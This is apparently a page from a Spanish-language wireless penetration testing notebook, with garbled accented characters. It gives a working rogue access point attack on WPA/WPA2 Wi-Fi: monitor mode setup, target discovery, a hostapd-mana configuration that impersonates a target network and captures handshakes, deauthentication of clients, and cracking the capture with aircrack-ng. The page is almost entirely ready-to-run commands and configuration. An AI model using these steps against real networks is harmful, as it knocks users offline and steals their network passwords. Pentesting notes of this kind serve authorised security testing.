馃煠
Wireless Penetration Testing
  • Inicio
  • General
    • Recursos de aprendizaje
    • Dispositivos inal谩mbricos
  • Wi-Fi
    • General
    • Tarjeta inal谩mbrica
    • Wireshark
    • Aircrack-ng
    • WEP
    • WPA/WPA2
    • WPA Enterprise
    • WPS
    • Rogue access point
    • Conexi贸n de red manual
Con tecnolog铆a de GitBook
En esta p谩gina

驴Te fue 煤til?

  1. Wi-Fi

Rogue access point

Habilitar modo monitor en tarjeta inal谩mbrica.

sudo airmon-ng check kill && sudo airmon-ng start <interface> && iw dev <interface-mon> info
sudo airmon-ng check kill && sudo airmon-ng start wlan0 && iw dev wlan0mon info

Captura de paquetes para identificar el BSSID, ESSID y canal objetivo.

sudo airodump-ng <interface-mon>

Deshabilitar modo monitor en tarjeta inal谩mbrica.

sudo airmon-ng stop <interface-mon> && iw dev <interface> info
sudo airmon-ng stop wlan0mon && iw dev wlan0 info

Creaci贸n de archivo de configuraci贸n de hostapd-mana.

hostapd-mana.conf
interface=<interface>
ssid=<ssid>
channel=<channel>
hw_mode=g
ieee80211n=1
# WPA=1, WPA2=2, WPA & WPA2=3
wpa=3
wpa_key_mgmt=WPA-PSK
wpa_passphrase=<any-password>
# WPA1
wpa_pairwise=TKIP CCMP
# WPA2
rsn_pairwise=TKIP CCMP 
mana_wpaout=/<path>/output.hccapx

Inicio de rogue access points.

sudo hostapd-mana hostapd-mana.conf

Desautenticaci贸n de cliente(s).

# Desautenticaci贸n dirigida
sudo aireplay-ng <interface-mon-01> -0 0 -a <BSSID> -c <client-mac-address>

# Desautenticaci贸n broadcast
sudo aireplay-ng <interface-mon-01> -0 0 -a <BSSID>

Cracking con Aircrack-ng.

aircrack-ng output.hccapx -e <ESSID> -w <path-wordlist>
AnteriorWPSSiguienteConexi贸n de red manual

脷ltima actualizaci贸n hace 2 a帽os

驴Te fue 煤til?